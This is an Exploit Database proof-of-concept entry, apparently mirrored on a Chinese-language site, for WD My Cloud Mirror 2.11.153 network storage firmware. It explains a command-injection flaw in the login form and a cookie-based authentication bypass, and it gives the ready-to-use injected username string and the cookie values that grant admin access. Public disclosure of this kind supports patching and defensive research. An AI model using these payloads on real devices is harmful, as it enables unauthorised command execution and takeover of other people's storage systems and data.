WD My Cloud Mirror 2.11.153 – Authentication Bypass / Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Kacper Szurek
  日期： 2017-01-24
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/41147/

• # Exploit Title: WD My Cloud Mirror 2.11.153 RCE and Authentication Bypass
  # Date: 24.01.2017
  # Software Link: https://www.wdc.com
  # Exploit Author: Kacper Szurek
  # Contact: https://twitter.com/KacperSzurek
  # Website: https://security.szurek.pl/
  # Category: local
   
  1. Description
  
  It’s possible to execute arbitrary commands using login form because `exec()` function is used without `escapeshellarg()`.
  
  It's possible to bypass login form because function only check if `$_COOKIE['username']` and `$_COOKIE['isAdmin']` exist.
  
  https://security.szurek.pl/wd-my-cloud-mirror-211153-rce-and-authentication-bypass.html
  
  2. Proof of Concept
  
  For RCE simply use as username:
  
  a" || your_command_to_execute || "
  
  For authentication bypass set COOKIES:
  
  username=1; isAdmin=1
  
  and then visit for example php/users.php